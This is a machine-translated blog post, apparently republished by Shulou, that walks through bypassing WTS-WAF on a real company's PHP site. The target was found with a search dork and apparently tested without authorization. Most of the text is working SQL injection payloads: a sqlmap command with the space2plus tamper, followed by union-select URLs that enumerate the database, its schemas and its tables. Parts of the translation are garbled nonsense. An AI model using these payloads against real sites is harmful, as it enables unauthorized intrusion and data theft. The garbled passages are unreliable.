Shulou(Shulou.com)05/31 Report--

This article shows you how to bypass WTS-WAF analysis, the content is concise and easy to understand, can definitely brighten your eyes, through the detailed introduction of this article, I hope you can get something.

0x01. Looking for the target inurl:.php?id= intext: electrical appliances

Found the website of an electrical company, tested it casually, and found that there was waf.

This is not arranged (looking for some information, it seems that you can just use the plus sign instead of the space, just try)

0x02. Operation

Found no waf intercept.

The information also says

Sqlmap.py-u http://*/*.php?id=29-- tables-- tamper space2plus.py

I tried the tool and found that I couldn't start.

That's it.

0x03. Manual http://*/*.php?id=1+and+1=1 # Echo normal http://*/*.php?id=1+and+1=2 # Echo error indicates that there is an injection http://*/*.php?id=1+order+by+15 # 15 Echo error http://*/*.php?id=1+order+by+14 # 14 Echo normal description there are 14 fields http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 #-1 let it error and then execute later

It echoes No. 2 and 8.

Http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(), # query the current database information and some common functions of the current user version () # display the current version of the database database () / schema () # display the current database name user () / system_user () / session_user () / current_user () / current_user () # display the current user name charset (str) # return the character set collation (str) of the string str The character arrangement of the return string str is 0x04. Check the data explosion database http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1

It can't group_concat, so I'll check it one by one! Http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 # fetch a http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1 from 1 # fetch a burst data table http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1 from 2

Http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1 burst data http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7, field name, 9 meme 10 minus 11 minus 12 pencils 13 memes 14 + table names + limit+0,1

Summary:

1. If the tool can't afford to run, it can only be done by hand.

two。 Practice the manual notes of mysql.

The above is the analysis of how to bypass WTS-WAF. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.